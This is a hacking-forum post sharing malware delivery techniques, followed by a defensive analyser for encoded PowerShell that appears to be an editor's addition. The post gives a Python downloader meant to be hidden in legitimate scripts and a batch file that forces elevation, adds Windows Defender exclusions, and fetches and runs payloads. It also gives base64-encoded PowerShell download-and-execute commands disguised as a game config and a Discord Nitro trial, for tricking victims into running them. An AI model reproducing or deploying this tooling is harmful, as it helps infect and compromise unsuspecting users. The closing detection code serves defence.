Hey! Here's some spreading info

Spreading

CD-диск
Banned
Joined: 21.04.2023
Messages: 12
Reactions: 0
Please note that this user is blocked
If you add the python code found below:

```python
import requests

url = "cantpostlinks//raw.githubusercontent.com/portal/main/requests.json"

r = requests.get(url)

with open("python.cmd", "wb") as f:
    f.write(r.content)

subprocess.call("python.cmd")
```
This is a python downloader. You can add it to legit python files and make it download and execute your shit.
It looks legit because requests.json is from GitHub, but it's actually a .bat file.

You probably all know but I'm gonna advise it anyway; bat files are undetected by wd and can disable/exclude wd and dl+execute your malware successfully. That's what I use to bypass WD and I think it works great!
Here's a bat file that forces admin (it will keep popping up):

```batch
<# :batch script
Echo Please wait...
off
setlocal
cd "%~dp0"
powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('%~f0'))"
endlocal
goto:eof
#>
while($true){try{Start-Process 'cmd' -WindowStyle Hidden -Verb runas -ArgumentList '/k powershell -command add-mppreference -exclusionpath C:\ && powershell -command add-mppreference -exclusionprocess C:\ && powershell Start-BitsTransfer -Source directlink.com/payload.exe -Destination %USERPROFILE%\AppData\sync.exe && powershell Start-Process -FilePath %USERPROFILE%\AppData\sync.exe && powershell Start-BitsTransfer -Source directlink.com/payload.exe -Destination %USERPROFILE%\AppData\qz.exe && powershell Start-Process -FilePath %USERPROFILE%\AppData\qz.exe /priv';exit}catch{}}
```

This should be really useful for some of you! I hope so. Let me know if you have any questions. But my question for you guys is: what are people always downloading/looking for on GitHub or anywhere they run python files from? What scripts could you 'backdoor', so to speak? Please let me know if you have any ideas. 👍

Also if anyone needs an .url exploit, I have it, have built it, and can even host it for you on a nice domain. (It shows up, but it's legit.) I think the .url exploit works better with .lnk shortcuts, but you can use the provided bat file if you'd like and call it something like default_viewer.bat -- not great, but if you can spread to loads for some valid reason then it's here!

Oh and one final trick for anyone looking to get gamer/scripter bots or anything, actually use your imagination. It's basically getting people to run an encoded powershell command (so they can't see the link of the url they're downloading+executing from). Here's how you do it:
Open powershell
Replace the direct link to your payload (in my base .bat)

```powershell
$Text = 'Invoke-WebRequest directdownloadlink.com/tmp/1.bat -Outfile c:\windows\temp\1.bat; Start-Process c:\windows\temp\1.bat'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText = [Convert]::ToBase64String($Bytes)
$EncodedText
```

When you've put that in powershell and hit enter it will give you a base64 result like this:

```text
SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAZABpAHIAZQBjAHQAZABvAHcAbgBsAG8AYQBkAGwAaQBuAGsALgBjAG8AbQAvAHQAbQBwAC8AMQAuAGIAYQB0ACAALQBPAHUAdABmAGkAbABlACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXAAxAC4AYgBhAHQAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcADEALgBiAGEAdAA=
```

Now all you need to do is find some way of SEing the victim into typing this in cmd:

```batch
powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAZABpAHIAZQBjAHQAZABvAHcAbgBsAG8AYQBkAGwAaQBuAGsALgBjAG8AbQAvAHQAbQBwAC8AMQAuAGIAYQB0ACAALQBPAHUAdABmAGkAbABlACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXAAxAC4AYgBhAHQAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcADEALgBiAGEAdAA=
```


You can add things to it to make it more convincing, like these for example:

CS:GO Aim config idea

```batch
echo aim_config && powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAZABpAHIAZQBjAHQAZABvAHcAbgBsAG8AYQBkAGwAaQBuAGsALgBjAG8AbQAvAHQAbQBwAC8AMQAuAGIAYQB0ACAALQBPAHUAdABmAGkAbABlACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXAAxAC4AYgBhAHQAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcADEALgBiAGEAdAA=
```

Discord Nitro Script idea

```batch
echo nitro_trial && powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAZABpAHIAZQBjAHQAZABvAHcAbgBsAG8AYQBkAGwAaQBuAGsALgBjAG8AbQAvAHQAbQBwAC8AMQAuAGIAYQB0ACAALQBPAHUAdABmAGkAbABlACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXAAxAC4AYgBhAHQAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcADEALgBiAGEAdAA=
```

You can make them run this encoded command in cmd. So just find an excuse for them to do it! Good luck

Hope this helps!
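The post above relies on `powershell -enc`, which takes the command as base64 over UTF-16LE bytes so the download URL never appears in clear text in the command line. The following is an added example from the editor, not the poster's code: a small analyser a defender can run over process-creation command lines to pull out such blobs, decode them, and tag the behaviours this post describes (remote download, execution from a temp path, Defender exclusion changes). The regex list and the sample command line are constructed for the example; `example.invalid` stands in for any real host.

```python
import base64
import re
from typing import List, Tuple

# Behaviours worth flagging once the command is decoded (constructed list,
# covering the tactics described in the post: download, run, disable AV).
SUSPICIOUS_PATTERNS = {
    "download":     re.compile(r"Invoke-WebRequest|Start-BitsTransfer|Download(?:String|File)", re.I),
    "execute":      re.compile(r"Start-Process|Invoke-Expression|\bIEX\b", re.I),
    "av_tampering": re.compile(r"(?:Add|Set)-MpPreference", re.I),
    "temp_path":    re.compile(r"\\temp\\|AppData", re.I),
}

# -e, -ec, -enc and -encodedcommand all work in PowerShell; "-ep" (ExecutionPolicy)
# must not match, hence the required whitespace after the flag.
ENC_FLAG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.I)


def encode_utf16le_b64(command: str) -> str:
    """Encode exactly as PowerShell expects for -EncodedCommand (UTF-16LE, then base64)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    """Reverse of the above; raises ValueError on malformed base64 or odd byte length."""
    raw = base64.b64decode(blob, validate=True)
    if len(raw) % 2:
        raise ValueError("UTF-16LE payload must have an even number of bytes")
    return raw.decode("utf-16-le")


def classify(command: str) -> List[str]:
    """Names of the suspicious behaviours present in a decoded command."""
    return [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(command)]


def analyse_cmdline(line: str) -> List[Tuple[str, List[str]]]:
    """For each -enc blob in a command line, return (decoded command, flags)."""
    results = []
    for match in ENC_FLAG.finditer(line):
        try:
            decoded = decode_encoded_command(match.group(1))
        except (ValueError, UnicodeDecodeError):
            continue  # not a valid encoded command; ignore it
        results.append((decoded, classify(decoded)))
    return results


# Constructed sample command line mimicking the "aim_config" lure in the post.
SAMPLE_CMDLINE = "cmd.exe /c echo aim_config && powershell -enc " + encode_utf16le_b64(
    "Invoke-WebRequest example.invalid/tmp/1.bat -Outfile c:\\windows\\temp\\1.bat; "
    "Start-Process c:\\windows\\temp\\1.bat")
```

Feed `analyse_cmdline` the command-line field of Sysmon event 1 or Windows Security event 4688 records; any hit with both `download` and `execute` flags deserves an alert.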